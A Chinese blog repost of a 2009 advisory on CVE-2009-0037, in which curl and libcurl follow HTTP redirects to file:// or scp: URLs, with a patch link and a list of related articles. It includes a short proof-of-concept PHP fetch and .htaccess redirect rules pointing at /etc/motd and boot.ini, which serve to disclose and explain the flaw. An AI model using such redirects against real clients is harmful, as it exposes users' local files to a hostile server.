cURL/libcURL HTTP Location:重新定向绕过安全限制漏洞

最新推荐文章于 2024-01-19 13:28:44 发布
最新推荐文章于 2024-01-19 13:28:44 发布
阅读量1.5k 收藏
点赞数
分类专栏: PHP 文章标签: redirect http服务器 file .htaccess url header
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sahusoft/article/details/4387993
版权

发布日期:2009-03-03
更新日期:2009-03-04

受影响系统:

Daniel Stenberg curl 5.11 - 7.19.3

不受影响系统:

Daniel Stenberg curl 7.19.4

描述:

BUGTRAQID: 33962
CVE(CAN) ID: CVE-2009-0037

cURL是命令行传输文件工具,支持FTP、FTPS、HTTP、HTTPS、GOPHER、TELNET、DICT、FILE和LDAP。

跟随HTTP Location:的cURL会重新定向到scp:或file:// URL,因此如果用户点击了特制的重新定向URL的话(例如libcurl客户端读取RSS源),恶意的HTTP服务器就可以覆盖或泄露任意本地文件系统的内容,或执行任意命令。

<*来源:David Kierznowski

链接:http://secunia.com/advisories/34138/
http://marc.info/?l=full-disclosure&m=123608232412287&q=p5
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
// This is an example of a vulnerable peice of PHP code
// If libcurl uses CURLOPT_FOLLOWLOCATION it could lead
// to arbitrary file access.
// The malicious redirect on withdk.com looks like this
// in .htaccess:
// # for Linux
// redirect 302 /test file:///etc/motd
// # for Win32
// redirect 302 /test file:///c:/boot.ini
// print_r ( curl_version() );
$c = new cc;
$c->fetch('http://withdk.com/malicious-redirect');
class cc {
function fetch($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$result1 = curl_exec($ch);
echo $result1;
curl_close($ch);
}
}
?>

建议:

厂商补丁:

Daniel Stenberg
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://curl.haxx.se/download/curl-7.19.4.zip

sahusoft
关注
专栏目录
服务器HTTP响应头安全性优化与漏洞修复方案
Bertram的博客
08-09 346
服务器HTTP响应头安全性优化与漏洞修复方案
漏洞修复--Haxx curl 安全漏洞 (CVE-2020-8177)
Q先生
11-15 1942
漏洞修复--Haxx curl 安全漏洞 (CVE-2020-8177)
24 年了,终于有人发现 curl 的这个 Bug 了
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
03-27 359
curl 作者 Daniel Stenberg 在个人博客分享了一个存在 23.9 年的 curl 漏洞curl 是常用的命令行工具,用来请求 Web 服务器,于 1997 年首次发行。据 Stenberg 透露,这个漏洞是在 curl 发布后的第 201 天引入的,但是直到第 8930 天,漏洞才修复好。一个持续了 23.9 年的漏洞背后有着怎样的故事?一切还得从 1998 年说起。curl ...
curl 身份认证绕过漏洞CVE-2023-27535)升级记录
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-08 786
curl在7.13.0-7.88.1版本中存在身份认证绕过漏洞libcurl将重用之前所创建的FTP连接,即使一个或多个参数被更改,可能会使有效用户变得不一样,从而导致使用错误的凭据进行第二次传输。官网:http://curl.haxx.se/download/影响范围:curl 7.13.0 - 7.88.1。
掰开揉碎,讲讲这个已存在近24年的CURL漏洞
smellycat000的专栏
09-08 882
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士这是一个与cookie、Internet代码和一个CVE有关的故事。故事发生在很久以前,所以搬好小板凳,仔细听好。当然,场景时候curl,它是与我工作有关的互联网传输工具和库。1998年1998年,我们推出curl 4.9。在那个年代,少有人听说过或用过curl。距离curl 网站宣布某个新发布的下载量达到300次还有几个月的时间要过。当时,cu...
libcurl linux 静态链接库_嵌入式 Linux下编译并使用curl静态库
weixin_39811101的博客
12-22 647
#x86./configure --disable-shared --enable-static --disable-ftp --disable-ipv6 --disable-rtsp --disable-tftp --disable-telnet --disable-largefile --disable-smtp --disable-imap --without-ssl --without-l...
微信开发之Curl
weixin_45566885的博客
11-28 633
1.什么是curl? Curl其实就是模拟浏览器请求的工具,比如获取远程的网页和接口 在微信开发过程当中: 使用开发模式创建微信自定义菜单,需要模拟HTTPS的 POST请求,这里就需要使用PHP的curl函数。 另外好多接口也要用到curl函数,因此curl函数是微信开发的基础,必须熟练掌握。 2.学习内容 1、curl函数基础 2、curl函数模拟GET 3、curl函数处理GET数据 4、c...
【php curl】php中curl的详解
编程哲学家的专栏
01-17 1004
本文我来给大家详细介绍下cURL的简单的使用方法,下文我将会给大家详细介绍cURL的高级应用, 好,废话不多说,我们先来认识下什么是cURL,可能还有很多同学没有听说过这个工具,我先来给大家简单介绍下什么是cURLcURL可以使用URL的语法模拟浏览器来传输数据, 因为它是模拟浏览器,因此它同样支持多种协议, FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DI...
最新kali之curl(二)
vanony的博客
01-23 853
描述:   传送网址。   curl是一个工具,使用支持的协议(DICT、FILE、FTP、FTPS、GOPHER、HTTPHTTPS、IMAP、IMAPS、LDAP、LDAPS、MQTT、POP3、POP3S、RTMP、RTMPS、RTSP、SCP、SFTP、SMB、SMBS、SMTP、SMTPS、TELNET和TFTP)从服务器传输数据。该命令被设计为无需用户交互即可工作。   curl提供了大量有用的技巧,如代理支持、用户身份验证、FTP上传、HTTP post、SSL连接、cookie、文件传输恢
php curl使用方法及相关参数说明
wyisgoodman的博客
01-08 534
php建立curl基本方法 /** * curl通用方法,可发送get请求和post请求 * @param $post * @param $url * @param string $type * @param array $header * @param bool $isUserAgent * @return bool|mixed|string */ function curlResult($post,$url,$type = 'POST', $cookie = '', $header =
curl&libcurl存在缓冲区溢出高危漏洞 (CVE-2023-38545)解决
qq_40619119的博客
10-13 4336
目前该漏洞只影响libcurl 7.69.0 ~ 8.3.0版本,不受漏洞影响的版本:libcurl < 7.69.0 和 >= 8.4.0。
php 禁止 curl,如何防止使用PHP cURL定向
weixin_30029951的博客
03-10 849
我正在开发一个表单,其中要求将收集的数据提交到第三方网站,格式为:http://www.domain.com/page?key=value&key2=value2我决定使用cURL,因为我还没有找到让我信服的替代品.我正在运行的问题是,一旦提交表单,就会执行cURL,但我将被重定向到我指定的域.相反,我想将用户重定向到我的域内的确认页面而不是第三方网站.这是我正在使用的代码示例:$URL=...
CentOS7.6下升级curl版本至8.5.0(漏洞修复)
最新发布
weixin_58949710的博客
01-19 2137
CentOS 7.6系统的curl 版本太老了,存在curl 安全漏洞CVE-2022-32221、CVE-2022-27778,所以要升级程序进行修复。
禁止linux curl抓取页面内容,curl抓取页面时遇到重定向的解决方法
weixin_32687875的博客
05-07 693
用php的curl抓取网页遇到了问题,为阐述方便,将代码简化如下:function curlGet($url) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, true);return...
HTTP协议相关漏洞
qq_48904485的博客
03-22 9451
一、HTTP协议 HTTP是一个基于请求与响应模式的、无状态的应用层协议。 请求响应   客户端要向web服务器发送一个请求以后,等待服务器回送http响应消息。 无状态   http协议整个过程当中的各种信息不会被服务器所记录下来。 常基于TCP的连接方式 ,即http是将数据打包成TCP数据包来进行传送的,绝大多数Web应用,都是构建在HTTP协议之上,即目前使用浏览器访问web网站都是以http协议为标准的。 1、HTTP协议的方法 GET :请求获取Request-URI所标识的资源 POST :
libcurl 使用方法简介
热门推荐
myvest的专栏
09-30 4万+
libcurl 使用方法简介背景简介使用方法1、easy interface使用方法2、multi interface使用方法 背景 最近想做一个简单的HLS拉流程序,HTTP的下载部分觉得采用libcurl来进行比较合适及方便,所以先介绍libcurl的基本用法,然后使用libcurl完成一个简单的下载小程序。 简介 libcurl是一个跨平台的开源网络协议库,支持http, https, rt...
赶紧排查!libcurl高危漏洞来了!
IT界那些事儿
10-09 2025
但注意,在curl新版本发布之前,关于这两个漏洞的信息,作者半个字都不会说。他的twitter中写的很清楚,甚至连这两个漏洞影响哪些版本都不会透露,防止大家根据这点信息去比较版本更新历史,找到这两个漏洞。如果仅仅是curl漏洞也不是什么大事,最关键的是,它的底层库 libcurl 被广泛应用于各种软件和项目中,使得开发者能够在其应用程序中进行网络交互。轩辕之前做C/C++开发中,就经常用到这个库。即便你没有直接引用,但你用到的一些中间件中,也很有可能间接用到了这个库,这样算下来,其影响面就非常广了。
注意!开源命令行工具Curl 中存在严重漏洞
smellycat000的专栏
10-09 836
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成为当今社会的根本性、基础性问题。随着软件产业的快速发展,软件供应链也越发复杂多元,复杂的软件供应链会引入一系列的安全问题,导致信息系统的整体安全防护难度越来越大。近年来,针对软件供应链的安全攻击事件一直呈快速增长...
curl/curl.h: no such file or
09-14
If you're getting the error message "curl/curl.h: no such file or directory" while compiling your code, it means that the compiler cannot find the header file for the Curl library. To resolve this ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值